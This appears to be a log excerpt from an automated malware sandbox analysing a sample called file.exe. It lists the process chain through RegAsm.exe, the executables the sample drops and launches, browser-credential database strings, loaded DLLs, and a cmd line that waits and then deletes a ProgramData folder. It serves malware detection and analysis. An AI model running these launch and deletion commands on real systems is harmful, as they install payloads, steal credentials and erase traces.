Source: HJKKFI.29.dr, IIJJDGHJKKJEBFHJDBGH.3.dr, GIJKKK.29.dr, GDHDAEBGCAAFIDGCGDHI.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
